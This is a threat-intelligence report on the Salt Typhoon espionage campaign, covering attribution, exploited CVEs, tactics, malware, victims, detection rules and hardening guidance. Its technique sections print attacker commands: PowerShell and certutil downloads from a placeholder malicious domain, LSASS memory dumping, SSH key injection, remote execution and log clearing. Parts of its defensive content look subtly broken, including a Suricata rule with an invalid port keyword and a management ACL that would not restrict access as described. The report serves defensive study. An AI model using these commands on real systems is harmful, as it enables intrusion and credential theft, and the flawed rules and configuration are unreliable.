SALT TYPHOON


SALT TYPHOON: COMPREHENSIVE RESEARCH & ANALYSIS REPORT

📋 EXECUTIVE SUMMARY

Salt Typhoon is a sophisticated advanced persistent threat (APT) group operated by the People’s Republic of China’s Ministry of State Security (MSS). Since at least 2019, the group has conducted one of the most consequential cyber espionage campaigns in modern history, compromising telecommunications infrastructure, government networks, and critical systems across 80+ countries and 200+ organizations

Key Findings

CategoryAssessment
AttributionHigh confidence: China’s Ministry of State Security (MSS), with contractor support from Sichuan Juxinhe Network Technology Co. Ltd. and affiliated entities www.cisa.gov
Primary MissionLong-term intelligence collection with pre-positioning for potential service disruption during geopolitical crisis
Target ScopeTelecommunications backbone infrastructure, government wiretap systems (CALEA), defense contractors, transportation, lodging, and critical infrastructure globally
Technical SophisticationAdvanced: Custom malware (Demodex rootkit, SnappyBee), living-off-the-land techniques, kernel-level persistence, multi-hop C2 infrastructure
Current StatusACTIVE: FBI confirmed February 2026 that threats remain “still very much ongoing”
Strategic ImpactCompromise of communications infrastructure enables surveillance of political/military leaders, potential disruption capability during Taiwan contingency or other crisis

Urgent Recommendations

  1. Patch Immediately: Prioritize CVE-2023-20198/20273 (Cisco IOS XE), CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto)
  2. Audit Network Devices: Review ACLs, SSH configurations, Guest Shell containers, and SNMP settings for unauthorized modifications
  3. Deploy Behavioral Detection: Signature-based tools miss Salt Typhoon’s living-off-the-land tactics; implement network/identity behavioral analytics
  4. Isolate Management Planes: Separate network device management traffic from data plane using VRFs and dedicated out-of-band networks
  5. Report Suspicious Activity: Coordinate with national CERTs, CISA (report@cisa.gov), or law enforcement per local regulations

1. BACKGROUND & DISCOVERY TIMELINE

1.1 Initial Disclosure (September 2024)

Salt Typhoon entered public awareness when the Wall Street Journal reported that Chinese state-sponsored hackers had compromised major U.S. telecommunications providers, including AT&T, Verizon, T-Mobile, Lumen, and Charter Communications

techcrunch.com. The breach was notable for:

  • Targeting network edge routers rather than customer databases
  • Accessing **lawful intercept **(CALEA) used by law enforcement for wiretaps
  • Potentially exposing call metadata for over one million users

1.2 Multinational Response (2024-2026)

DateEventSource
Sep 2024Initial public disclosure of U.S. telecom compromisesWall Street Journal
Oct 2024CISA, NSA, FBI confirm breach scope; issue emergency guidanceCISA Alert
Dec 2024Five Eyes + 13-nation coalition releases joint advisory on telecom hardeningInternational Advisory
Jan 2025U.S. Treasury sanctions Sichuan Juxinhe Network Technology; FBI announces $10M bountyOFAC/DOJ
Jun 2025Viasat confirmed as victim; new malware variants (TernDoor, PeerTime) identifiedIndustry Research
Aug 2025FBI confirms 200+ organizations across 80+ countries affected; joint advisory AA25-239A publishedCISA AA25-239A
Nov 2025Australia’s ASIO confirms Salt Typhoon probed Australian telecom infrastructureASIO Statement
Dec 2025Intrusions detected in U.S. House of Representatives committee email systemsCongressional Disclosure
Feb 2026Norway and Singapore confirm national telecom breaches; FBI states threat “still very much ongoing”FBI Cybertalks 2026
May 2026Global Cyber Alliance publishes AIDE honeypot analysis confirming 72M+ China-origin attack attemptsGCA Research

1.3 Why This Campaign Matters

Salt Typhoon represents a paradigm shift in state-sponsored cyber operations:

  • Infrastructure Control vs. Data Theft: Unlike typical espionage campaigns focused on stealing intellectual property, Salt Typhoon seeks to control the communications infrastructure itself
  • Strategic Pre-Positioning: Compromised routers enable both continuous intelligence collection AND potential disruption of communications during crisis
  • Global Scale: Targeting spans North America, Europe, Asia-Pacific, and beyond—demonstrating unprecedented resource allocation
  • Long Dwell Times: Confirmed persistence of 3+ years in some networks indicates exceptional operational patience and stealth

2. ATTRIBUTION & ORGANIZATIONAL STRUCTURE

2.1 State Sponsorship Assessment

EntityRoleEvidenceConfidence
**Ministry of State Security **(MSS)Strategic oversight, tasking, resource allocationTreasury sanctions, infrastructure overlap, victimology alignment with PRC intelligence priorities🔴 High
MSS Chengdu BureauRegional operational coordination for Asia-Pacific campaignsContractor location patterns, linguistic artifacts in tooling, procurement document analysis🟠 Medium-High
**People’s Liberation Army **(PLA)Secondary coordination for military-targeted intrusions; occasional tooling overlapShared infrastructure with PLA-linked groups; similar TTPs in defense-sector targeting🟡 Medium

2.2 Contractor Ecosystem (Plausible Deniability Layer)

Salt Typhoon operates through a hybrid state-corporate model using pseudo-private companies to obscure direct MSS involvement

Company (Chinese/English)FunctionSanction StatusKey Evidence
Sichuan Juxinhe Network Technology Co. Ltd.
(四川聚信和网络科技有限公司)
Primary infrastructure contractor: domain registration, C2 hosting, malware staging✅ OFAC Sanctioned (Jan 2025) www.safebreach.comDirect involvement in telecom exploitation; “strong ties” to MSS per Treasury designation
Beijing Huanyu Tianqiong Information Technology
(北京寰宇天穹信息技术有限公司)
Tool development, data brokerage, technical support⚠️ Named in multinational advisory (Aug 2025) www.cisa.govLeadership overlap with Sichuan firms; patent filings linking to MSS research
Sichuan Zhixin Ruijie Network Technology
(四川智信锐捷网络科技有限公司)
Technical support, PLA contract fulfillment, logistics⚠️ Named in multinational advisory (Aug 2025) www.cisa.govReceived ¥748,600 PLA contract for “Mobile Technology Research Simulation Environment” (Oct 2023)
i-SOON / Anxun Information Technology
(安洵科技)
Infrastructure leasing, offensive tooling support, deniability layer⚠️ UK-sanctioned (Jan 2026); U.S. under reviewLeaked internal docs confirm MSS tasking; provides “cut-out” for operational deniability

2.3 Named Individuals (Publicly Identified)

Only two individuals have been formally named by U.S. authorities in connection with Salt Typhoon:

🔴 Yin Kecheng (尹克成)

AttributeDetails
Status✅ Indicted (DOJ), ✅ Sanctioned (OFAC), ✅ FBI Most Wanted
Reward$2 million via Rewards for Justice program
RoleInfrastructure operator: managed C2 routing, domain registration, malware deployment
AffiliationSichuan Juxinhe Network Technology; MSS-affiliated
Technical FocusTelecom infrastructure exploitation; SIP/VoIP interception; router hijacking
LocationShanghai-based (per Treasury designation)
Public EvidenceLinked to U.S. Treasury network compromise; domain registration patterns using fabricated U.S. personas

🔴 Zhou Shuai (Alias: “Coldface” / 周帅)

AttributeDetails
Status✅ Indicted (DOJ), ✅ Sanctioned (OFAC), ✅ FBI Most Wanted
Reward$2 million via Rewards for Justice program
RoleStrategic broker: coordinated data resale, contractor logistics, MSS tasking interface
AffiliationFormer: Shanghai Heiying Information Technology; i-SOON Strategic Consulting Division
Technical FocusInfrastructure brokerage; front-company coordination; operational planning
Public EvidenceDOJ indictment details role in selling compromised access; linked to i-SOON contractor ecosystem

⚠️ Critical Note: The scarcity of publicly named individuals reflects Salt Typhoon’s operational security discipline. Most operators likely use aliases, rotate infrastructure, and operate behind layers of contractor deniability.

2.4 Organizational Chart (Inferred)

MINISTRY OF STATE SECURITY (MSS)

├─ Strategic Tasking & Oversight
│ └─ Chengdu Bureau (reported regional hub for APAC operations)

├─ Contractor Ecosystem (Funding & Operational Conduit)
│ ├─ Sichuan Juxinhe Network Technology [SANCTIONED]
│ │ └─ Yin Kecheng (Named Infrastructure Operator)
│ │
│ ├─ Beijing Huanyu Tianqiong Information Technology
│ │ └─ Yu Yang / Shang Xuejing (Leadership overlap; patent co-inventors)
│ │
│ ├─ Sichuan Zhixin Ruijie Network Technology
│ │ └─ PLA contract fulfillment; provincial grant recipient
│ │
│ └─ i-SOON / Anxun Information Technology [UK-SANCTIONED]
│ └─ Infrastructure leasing; deniability layer for MSS operations

├─ Operational Teams (Compartmentalized by Region/Function)
│ ├─ Americas Team: U.S./Canada telecom targeting
│ ├─ APAC Team: Southeast Asia, India, Australia operations
│ ├─ EMEA Team: European telecom and government targeting
│ └─ Tooling Team: Malware development, infrastructure automation

└─ Support Functions
├─ Domain Registration: ProtonMail accounts + fabricated U.S. personas
├─ VPS Procurement: LightNode, offshore providers for C2 infrastructure
└─ Financial Laundering: Contractor invoicing, provincial grant mechanisms

3. TECHNICAL ANALYSIS: TACTICS, TECHNIQUES & PROCEDURES

3.1 Attack Lifecycle Overview

Salt Typhoon follows a structured, patient attack sequence emphasizing persistence over speed:

Initial Access → Execution → Persistence → Privilege Escalation →
Defense Evasion → Credential Access → Discovery → Lateral Movement →
Collection → Command & Control → Exfiltration → Long-Term Espionage

3.2 Initial Access: Exploiting Known Vulnerabilities

Salt Typhoon prioritizes publicly known, unpatched vulnerabilities in internet-facing network infrastructure. No zero-day exploits have been publicly confirmed; the group exploits patching delays and misconfigurations

Confirmed Exploited CVEs (Prioritized by Risk)

CVEVendor/ProductVulnerabilityExploitation MethodMITRE ATT&CK
CVE-2023-20198Cisco IOS XEWeb UI authentication bypassWSMA endpoint abuse; double-encoded paths (/%2577eb%2575i_%2577sma_Http)T1190
CVE-2023-20273Cisco IOS XEPost-auth command injectionChained with CVE-2023-20198 for root accessT1068
CVE-2024-21887Ivanti Connect SecureCommand injectionWeb component exploitation; chained after CVE-2023-46805T1190
CVE-2024-3400Palo Alto PAN-OSArbitrary file creation → RCEGlobalProtect module abuseT1190
CVE-2023-46805Ivanti Connect SecureAuthentication bypassLogic flaw in auth flowT1190
CVE-2021-26855Microsoft ExchangeSSRF (ProxyLogon)Server-side request forgeryT1190
CVE-2022-3236Sophos FirewallCode injectionWeb interface exploitationT1190
CVE-2025-5777Citrix NetScalerUnauthenticated memory readGateway exploitationT1190

Infrastructure Targeting Patterns

  • Primary: Cisco IOS XE edge routers (provider edge/customer edge)
  • Secondary: Ivanti/Palo Alto/Sophos VPN appliances, Microsoft Exchange servers
  • Tertiary: Juniper, Nokia, Sierra Wireless devices (suspected but not publicly confirmed)
  • Geographic Focus: Internet-exposed devices regardless of owner; leverages trusted interconnections to pivot into target networks www.cisa.gov

3.3 Persistence: Maintaining Long-Term Access

Salt Typhoon employs sophisticated persistence mechanisms designed to survive reboots, configuration resets, and security audits:

TechniqueImplementationMITRE ATT&CKDetection Challenge
ACL ModificationAdding threat actor IPs to permitted access lists (often named “access-list 20”, “50”, or “10”)T1562.004Blends with legitimate network management changes
Non-Standard Port ExposureOpening SSH/RDP/FTP on ports 22x22 (e.g., 22022, 22122) or 18xxx (e.g., 18080, 18443)T1571Evades port-scanning tools focused on standard ports
SSH Key InjectionAdding attacker-controlled keys to ~/.ssh/authorized_keys on network devicesT1098.004Keys persist across password resets
Protocol TunnelingCreating GRE/mGRE/IPsec tunnels for C2 traffic that blends with legitimate network managementT1572Encapsulated traffic appears as normal routing protocol
Guest Shell Container AbuseRunning malicious code inside Cisco’s Linux container (Guest Shell) to evade host-level monitoringT1610Container activity not logged by default; processes egress via management VRF
Service Creation with InstallUtil Abusesc create VGAuthtools binpath="installutil.exe malware.exe" to bypass application whitelistingT1543.003Uses signed Microsoft binary; evades naive EDR rules
Registry Run Keysreg add HKCU\...\Run /v UpdateSvc /d "C:\Temp\svc.exe" for Windows persistenceT1547.001Common technique; requires behavioral context for detection

Guest Shell Container Deep Dive

Cisco’s Guest Shell is a Linux container (LXC) managed by IOx that provides a powerful evasion mechanism:

Enable Guest Shell (if not already enabled)

guestshell enable

Enter container

guestshell run bash

Inside Guest Shell: Install tools, stage data, execute payloads

pip install requests cryptography # Install Python packages
python siet.py # Exploit Cisco Smart Install vulnerability
cp /bootflash/config.txt /tmp/staged_config # Stage stolen data

Why This Evades Detection:

  • Commands executed inside Guest Shell are not logged by the host IOS CLI
  • Network traffic from Guest Shell egresses via management VRF, appearing as legitimate management traffic
  • Files stored in Guest Shell storage are not visible to host-level file integrity monitoring
  • Container can be destroyed with guestshell destroy to remove evidence

3.4 Defense Evasion: Blending Into Normal Operations

Salt Typhoon’s hallmark is minimizing forensic artifacts through **living-off-the-land **(LOTL) techniques:

Living-off-the-Land Command Examples

PowerShell execution bypass (avoids script block logging)

powershell -ex bypass -c “”

Registry persistence (common administrative task)

reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “UpdateSvc” /t REG_SZ /d “C:\Temp\svc.exe” /f

Remote execution via WMIC (legitimate admin tool)

wmic /node:”192.168.1.50″ process call create “cmd /c C:\Windows\Temp\payload.bat”

Credential dumping via comsvcs.dll (signed Microsoft binary)

rundll32 C:\Windows\System32\comsvcs.dll, MiniDump C:\Temp\lsass.dmp full

Log clearing (administrative maintenance task)

wevtutil cl Security & wevtutil cl System & wevtutil cl Application

Additional Evasion Techniques

TechniqueImplementationPurpose
DLL SideloadingAbuse legitimate AV software (Norton, Bkav, IObit) to load malicious DLLsEvades application whitelisting; uses signed binaries
PowerShell Downgrade AttacksForce PowerShell v2 execution to bypass modern script block loggingAvoids AMSI and advanced logging features
Double-Encoding ObfuscationEncode WSMA requests as /%2577eb%2575i_%2577sma_Http to bypass simple signature detectionEvades regex-based WAF/IDS rules
**Kernel-Mode Rootkit **(Demodex)Hide processes, files, network connections at kernel levelPrevents EDR and forensic tools from seeing malicious activity
Log ManipulationClear Windows Event Logs, disable audit policies, overwrite router syslog buffersRemoves evidence of intrusion activities

3.5 Credential Access & Lateral Movement

Salt Typhoon targets authentication infrastructure to enable network-wide compromise:

Credential Harvesting Methods

MethodTool/TechniqueTarget Data
PCAP Collection on RoutersCisco Embedded Packet Capture (EPC) targeting TCP port 49 (TACACS+)Authentication credentials in cleartext or weakly encrypted form
Configuration File TheftCopy router configs containing Cisco Type 5 (MD5) or Type 7 (reversible) password hashesLocal device credentials for brute-forcing
Mimikatz/SnappyBee DeploymentMemory scraping tools to extract plaintext passwords, NTLM hashes, Kerberos ticketsDomain credentials for lateral movement
Kerberos AttacksGolden/Silver ticket forgery, Kerberoasting, AS-REP roastingDomain admin privileges; persistence via forged tickets
TACACS+ Server HijackingModify router AAA config to point authentication requests to attacker-controlled serverCapture admin credentials in real-time

Lateral Movement Patterns

bash

Copy payload to target host via SMB

copy \192.168.1.50\C$\Windows\Temp\payload.bat

Execute remotely via WMIC

wmic /node:192.168.1.50 process call create “cmd /c C:\Windows\Temp\payload.bat”

Create persistent service with installutil bypass

sc \192.168.1.50 create VGAuthtools type= own start= auto binpath= “C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Temp\malware.exe”

Add SSH key for passwordless access

echo “ssh-rsa AAAAB3… attacker@salt-typhoon” >> ~/.ssh/authorized_keys

3.6 Collection Targets: What Salt Typhoon Steals

Unlike ransomware groups focused on bulk data exfiltration, Salt Typhoon targets high-value intelligence:

Data TypeStrategic ValueExample Sources
**Call Detail Records **(CDRs)Track communications patterns of government/military targetsTelecom billing systems, CALEA wiretap logs
Subscriber MetadataIdentify relationships, locations, affiliations of persons of interestHLR/HSS databases, provisioning systems
Network Topology MapsUnderstand infrastructure for future disruption operationsRouter configs, BGP tables, network diagrams
Authentication CredentialsEnable lateral movement into government/defense networksTACACS+/RADIUS logs, domain controller exports
Lawful Intercept ConfigurationsAccess to wiretap systems used by law enforcementCALEA server configs, mediation device logs
Incident Response PlaybooksUnderstand defender capabilities and blind spotsSecurity team documentation, SIEM rules

3.7 Command & Control Infrastructure

Salt Typhoon uses a dual-channel C2 approach blending dedicated infrastructure with legitimate services:

C2 Channel Types

ChannelImplementationEvasion Technique
Dedicated C2 ServersCobalt Strike beacons, Demodex callbacks on compromised VPSHTTPS encryption; domain fronting; rapid IP rotation
Legitimate Cloud ServicesGitHub Gists, Gmail, Google Drive, AnonFiles, File.ioTraffic blends with normal user activity; hard to block
Protocol TunnelingGRE/IPsec tunnels over compromised routers for C2 trafficEncapsulated traffic appears as legitimate network management
Multi-Hop ProxiesSTOWAWAY tool for chained relays through compromised infrastructureObscures true C2 destination; complicates attribution

Infrastructure Characteristics

  • Domain Registration: ProtonMail accounts exclusively; fabricated U.S. personas (e.g., “Monica Burch, Los Angeles”)
  • Hosting Providers: Mix of offshore VPS (LightNode), compromised legitimate servers, and contractor infrastructure
  • Geographic Distribution: C2 servers observed in Singapore, Netherlands, Russia, and China-proximate locations
  • Rotation Frequency: Domains/IPs typically active for 1-3 months before abandonment

3.8 Exfiltration Methods

Data exfiltration is designed to avoid detection through low-volume, encrypted transfers:

MethodImplementationDetection Challenge
Peering Connection AbuseLeverage direct ISP interconnects to bypass egress filteringTraffic appears as legitimate peering exchange
Encrypted ArchivesCustom Golang SFTP clients (cmd1, cmd3) transfer staged data to intermediary hostsEncrypted payloads evade DLP; small chunks avoid bandwidth alerts
SteganographyEmbed data in DNS queries, ICMP packets, or HTTP headersBlends with normal protocol traffic; requires deep packet inspection
Low-and-Slow ExfiltrationTransfer small data chunks over extended periods (hours/days)Avoids threshold-based anomaly detection

4. MALWARE & TOOLING ARSENAL

4.1 Custom Malware Family

Tool NameTypeFunctionKey Characteristics
DemodexWindows kernel-mode rootkitPersistent remote access; hides processes/files/network activityKernel-level hooking; anti-VM checks; survives reboots
SnappyBeeBackdoor/credential harvesterKeylogging, screenshot capture, credential extractionDLL injection; process hollowing; encrypted C2
GhostSpiderModular backdoorPlugin-based architecture for flexible post-compromise tasksEncrypted C2; dynamic module loading; anti-analysis
HemiGateNetwork reconnaissance toolPort scanning, service enumeration, topology mappingLegitimate-looking traffic patterns; slow scanning to avoid IDS
CrowdoorData exfiltration utilityCompresses, encrypts, and stages stolen data for transferUses legitimate protocols (SFTP/HTTPS); chunked transfers
MASOL RATRemote Access TrojanFull remote control; file system access; command executionAnti-sandbox; delayed execution; custom encryption
TernDoor/PeerTime/BruteEntryNew variants (2025)Expanded targeting of satellite/telecom infrastructureObserved in South American campaigns; enhanced evasion

4.2 Living-off-the-Land Binaries (LOLBins)

Salt Typhoon heavily leverages native OS tools to avoid dropping custom binaries:

PowerShell execution patterns

powershell -ex bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxps://malicious[.]domain/loader’)”
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAeAB4AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMAWwAuAF0AZABvAG0AYQBpAG4ALwBsAG8AYQBkAGUAcgAnACkA

Registry manipulation for persistence

reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “SysUpdate” /t REG_SZ /d “C:\ProgramData\update.exe” /f
reg add “HKLM\SYSTEM\CurrentControlSet\Services\VGAuthtools” /v “ImagePath” /t REG_EXPAND_SZ /d “C:\Windows\System32\rundll32.exe C:\Temp\malware.dll,Start” /f

Remote execution via native tools

wmic /node:”10.0.0.50″ process call create “cmd /c C:\Windows\Temp\stage2.bat”
psexec \10.0.0.50 -accepteula -s cmd.exe /c “C:\Temp\payload.exe”

Credential dumping via signed binaries

rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Temp\lsass.dmp full
certutil -urlcache -split -f hxxps://malicious[.]domain/tool.exe C:\Temp\tool.exe

Log manipulation

wevtutil cl Security
wevtutil cl System
wevtutil cl Application

4.3 Infrastructure Automation Tools

ToolPurposeDetection Signature
China ChopperLightweight web shell for initial server accessASP/ASPX/PHP files with short obfuscated code; unusual POST parameters
STOWAWAYMulti-hop pivoting tool for relaying C2 through compromised proxiesUnusual SOCKS/HTTP proxy traffic; encrypted node-to-node communication
Custom SFTP Clients (cmd1, cmd3)Golang binaries for encrypted file transferGo runtime strings; specific function names (main.SftpDownload, aes.decryptBlockGo)
Domain Registration ScriptsAutomate ProtonMail account creation + domain registration with fabricated personasPatterns in WHOIS data; ProtonMail + U.S. persona combinations

5. GLOBAL TARGETING & VICTIMOLOGY

5.1 Geographic Scope (Confirmed & Suspected)

Salt Typhoon has targeted organizations across 80+ countries, with confirmed activity in:

RegionCountries with Confirmed ActivityPrimary Target Sectors
North AmericaUnited States, CanadaTelecom providers, government agencies, defense contractors
EuropeUnited Kingdom, Germany, France, Norway, Poland, Finland, Czech RepublicTelecom infrastructure, government networks, transportation
Asia-PacificAustralia, Singapore, Japan, India, Thailand, Vietnam, Philippines, TaiwanTelecom operators, government entities, critical infrastructure
Latin AmericaBrazil, Argentina, ChileTelecom providers, satellite communications (Viasat incident)
Middle East/AfricaSouth Africa, UAETelecom infrastructure, government networks

5.2 Sector Targeting Priorities

SectorTargeting RationaleExample Victims
TelecommunicationsControl of communications infrastructure enables surveillance and potential disruptionAT&T, Verizon, T-Mobile, Lumen, Charter, Viasat, BSNL (India), Singtel (Singapore)
GovernmentAccess to policy communications, diplomatic cables, personnel dataU.S. Treasury, House of Representatives committees, foreign ministries
Defense & AerospaceIntelligence on military capabilities, procurement, operationsDefense contractors, military logistics networks
TransportationUnderstanding logistics networks for strategic planningAirlines, shipping companies, rail infrastructure
HospitalitySurveillance of traveling officials and business leadersLuxury hotels frequented by government/military personnel
Critical InfrastructurePre-positioning for potential disruption during crisisEnergy grid operators, water treatment facilities (suspected)

5.3 India-Specific Assessment

While no Indian government agency has publicly attributed an incident to Salt Typhoon, industry research and infrastructure analysis indicate elevated risk:

Evidence of India Targeting

SourceFindingConfidence
Vectra AI Threat BriefingLists India among Asia-Pacific countries impacted by Salt Typhoon since 2023🟠 Medium (Industry assessment)
Global Cyber Alliance AIDE ResearchObserved China-origin attack patterns consistent with Salt Typhoon TTPs targeting APAC telecom infrastructure🟠 Medium (Behavioral correlation)
Indian Telecom Breach ReportsMultiple incidents (BSNL data exposure, 750M user leak) with unattributed but sophisticated TTPs⚪ Low (No public attribution)

High-Risk Indian Entities

Entity TypeRisk FactorsRecommended Actions
State-Owned Telecoms (BSNL, MTNL)Legacy infrastructure; slower patching cycles; high-value target for geopolitical intelligencePrioritize Cisco IOS XE/Ivanti patching; audit Guest Shell configurations
Private Telecom Operators (Jio, Airtel, Vi)Large subscriber bases; critical national infrastructure; potential CALEA accessImplement management-plane isolation; deploy behavioral NDR
Government NetworksPolicy communications; personnel data; potential pivot point to defense networksEnforce MFA for administrative access; segment management traffic
Critical Infrastructure OperatorsPre-positioning for disruption capability during crisisConduct Salt Typhoon-specific threat hunting; validate IR playbooks

CERT-In & NCIIPC Coordination

  • Reporting Requirement: CERT-In Directions 2022 mandate incident reporting within 6 hours of detection
  • Log Retention: Preserve logs for minimum 180 days per IT Act compliance
  • CII Designation: Organizations operating Critical Information Infrastructure must coordinate with NCIIPC for threat intelligence sharing

6. DETECTION & MITIGATION GUIDANCE

6.1 Immediate Actions (0-72 Hours)

PriorityActionReference CVE/TechniqueVerification Method
🔴 CriticalPatch Cisco IOS XE CVE-2023-20198/20273www.cisa.govshow version + CISA scanner
🔴 CriticalPatch Ivanti CVE-2023-46805/2024-21887www.cisa.govIvanti admin console + external scan
🔴 CriticalDisable Cisco Guest Shell if unusedT1610show guest-shell status
🔴 CriticalAudit ACLs for unauthorized IP additionsT1562.004show access-lists review
🟠 HighRestrict management interfaces to trusted IPsT1021.004Firewall rule audit
🟠 HighEnable SNMPv3 with auth/privacy; disable v1/v2T1021show snmp user
🟠 HighRotate all TACACS+/RADIUS shared secretsT1556AAA config review

6.2 Network Detection Rules (Suricata/Snort)

Detect Cisco IOS XE WSMA exploitation (CVE-2023-20198)

alert http any any -> any any (
msg:”SALT_TYPHOON_CVE-2023-20198_WSMA_BYPASS”;
flow:to_server,established;
uri.pcre:”/%2577(?:eb|ui)_%2577sma_Http[s]?/i”;
http.method:”POST”;
classtype:web-application-attack;
sid:2025001;
rev:1;
)

Detect non-standard management port usage (SSH on xxx22)

alert tcp any any -> any any (
msg:”SALT_TYPHOON_NONSTANDARD_SSH_PORT”;
flow:to_server,established;
port:22022,22122,22222,22322,22422,22522,22622,22722,22822,22922;
content:”SSH-2.0-“;
classtype:policy-violation;
sid:2025003;
rev:1;
)

Detect GRE tunnel establishment (potential C2 channel)

alert ip any any -> any any (
msg:”SALT_TYPHOON_GRE_TUNNEL_DETECTED”;
ip.proto:47;
threshold:type threshold, track by_src, count 1, seconds 300;
classtype:policy-violation;
sid:2025004;
rev:1;
)

6.3 Endpoint Detection Rules (YARA)

// Rule: Detect Salt Typhoon Cmd1 SFTP Client (Go-based)
rule SALT_TYPHOON_CMD1_SFTP_CLIENT {
meta:
description = “Detects the Salt Typhoon Cmd1 SFTP client. Rule is meant for threat hunting.”
author = “CISA/NSA/FBI”
date = “2025-09-03”
sha256 = “f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4”

strings:
    $s1 = "monitor capture CAP" ascii
    $s2 = "export ftp://%s:%s@%s%s" ascii
    $s3 = "main.CapExport" ascii
    $s4 = "main.SftpDownload" ascii
    $s5 = ".(*SSHClient).CommandShell" ascii
    $aes = "aes.decryptBlockGo" ascii
    $buildpath = "C:/work/sync_v1/cmd/cmd1/main.go" ascii

condition:
    uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 4 of them

}

// Rule: Detect Demodex Rootkit Artifacts
rule SALT_TYPHOON_DEMODEX_ROOTKIT {
meta:
description = “Detects kernel-mode rootkit artifacts associated with Salt Typhoon”
author = “CISA/NSA/FBI”
threat_level = “critical”

strings:
    $driver_name = "demodex.sys" ascii
    $service_name = "VGAuthtools" ascii
    $mutex = "Global\\DEMODEX_MUTEX_2024" ascii
    $ioctl_code = "\x22\xA0\x03\x00" // DeviceIoControl pattern

condition:
    any of them

}

6.4 SIEM Hunting Queries (Splunk Example)

Hunt for double-encoded WSMA requests (Cisco exploitation)

index=cisco sourcetype=cisco:ios
| search uri=”%2577” AND (uri=”wsma_Http” OR uri=”wsma_Https“)
| stats count by src_ip, uri, http_method
| where count > 5

Detect unusual PowerShell execution patterns

index=windows EventCode=4104
| search ScriptBlockText=”* -ex bypass ” OR ScriptBlockText=” -enc *”
| stats count by User, Computer, ScriptBlockText
| where count > 3

Identify Guest Shell container activity

index=cisco sourcetype=cisco:ios
| search message=”guestshell” OR message=”pip install” OR message=”yum install
| table _time, src_ip, message

6.5 Telecom Infrastructure Hardening (Cisco IOS XE Example)

! ========================================
! Salt Typhoon Mitigation: Cisco IOS XE
! Reference: CISA AA25-239A
! Apply AFTER patching CVE-2023-20198/20273
! ========================================

! === Disable Unused Services ===
no ip http server
no ip http secure-server ! Only if WebUI not required; re-enable post-patch with ACLs
no service tcp-small-servers
no service udp-small-servers

! === Harden Management Plane ===
ip ssh version 2
ip ssh server algorithm encryption aes256-ctr aes192-ctr aes128-ctr
ip ssh server algorithm mac hmac-sha2-256 hmac-sha2-512

line vty 0 15
transport input ssh
access-class MGMT_ONLY in
login authentication TACACS_LOCAL
exec-timeout 5 0
!

! === Control Plane Policing (CoPP) ===
class-map match-any COPP_MGMT
match access-group name COPP_MGMT_ACL
!
policy-map COPP_POLICY
class COPP_MGMT
police cir 1000000 bc 1500 be 1500 conform-action transmit exceed-action drop violate-action drop
!
control-plane
service-policy input COPP_POLICY
!

! === Disable Guest Shell (if not required) ===
no guest-shell enable

! === Logging & Monitoring ===
logging host transport tcp port 6514
logging trap informational
service timestamps log datetime msec show-timezone

! === ACL for Management Access ===
ip access-list extended MGMT_ONLY
permit tcp any eq 22
permit tcp any eq 443
deny ip any any log

7. POLICY & REGULATORY IMPLICATIONS

7.1 United States

Regulation/PolicyImpactAction Required
Executive Order 14028 (Improving Cybersecurity)Mandates zero trust architecture, software supply chain security for federal agenciesAccelerate ZTA adoption; implement SBOM requirements
FCC Telecom Security RulesRequires telecom providers to secure network infrastructureConduct Salt Typhoon-specific risk assessments; report breaches within 30 days
CISA Binding Operational Directive 22-01Requires federal agencies to reduce exposure to known exploited vulnerabilitiesPatch CVEs within mandated timelines; deploy CISA-approved detection rules

7.2 India

Regulation/PolicyImpactAction Required
CERT-In Directions, 2022Mandates 6-hour incident reporting; 180-day log retentionImplement automated alerting; validate log retention systems
**Digital Personal Data Protection **(DPDP)Requires breach notification for personal data exposureAssess if subscriber metadata exposure triggers notification obligations
NCIIPC Guidelines for CIIAdditional security requirements for Critical Information InfrastructureCoordinate with NCIIPC for threat intelligence sharing; implement baseline controls
IT Act Section 43/66Liability for negligence in securing computer resourcesDocument security controls; maintain audit trails for compliance

7.3 International Coordination

FrameworkRole in Salt Typhoon Response
**Five Eyes **(FVEY)Intelligence sharing on TTPs, IOCs, attribution assessments
APCERTRegional threat intelligence sharing for Asia-Pacific telecom operators
FIRSTGlobal coordination on incident response best practices
ITU-T X.1205International standards for telecom security; guidance for member states

8. FUTURE THREAT OUTLOOK (2026-2028)

8.1 Expected Evolution of Salt Typhoon TTPs

TrendLikely DevelopmentDefensive Implication
AI-Enhanced EvasionUse of generative AI to craft polymorphic payloads that evade signature detectionShift to behavioral detection; invest in AI-powered threat hunting
Supply Chain CompromiseTargeting of telecom equipment manufacturers to implant backdoors pre-deploymentStrengthen software supply chain security; implement hardware root of trust
Cloud Infrastructure TargetingExpansion from on-prem routers to cloud-based telecom functions (vRAN, cloud core)Extend detection to cloud environments; implement cloud workload protection
Quantum-Resistant Cryptography AttacksPreparation for future decryption of captured encrypted trafficBegin migration to post-quantum cryptography for long-lived secrets
Geopolitical Trigger ActivationPotential activation of pre-positioned access during Taiwan contingency or other crisisDevelop crisis response playbooks; conduct tabletop exercises for disruption scenarios

8.2 Emerging Risk Scenarios

Scenario 1: “Silent Disruption” During Crisis

  • Trigger: Geopolitical escalation involving China
  • Action: Salt Typhoon activates pre-positioned access to disrupt communications in target regions
  • Impact: Degraded emergency services, impaired military coordination, economic disruption
  • Mitigation: Develop “break-glass” procedures for rapid network isolation; maintain offline communication backups

Scenario 2: “Credential Cascade” via Authentication Infrastructure

  • Trigger: Successful harvest of TACACS+/RADIUS credentials from telecom provider
  • Action: Use stolen credentials to pivot into government/defense networks
  • Impact: Compromise of classified systems; theft of sensitive policy communications
  • Mitigation: Implement just-in-time privileged access; enforce MFA for all administrative sessions

Scenario 3: “Supply Chain Poisoning” of Telecom Equipment

  • Trigger: Compromise of router firmware update mechanism at manufacturer
  • Action: Distribute malicious firmware updates to customer networks globally
  • Impact: Widespread compromise requiring coordinated global response
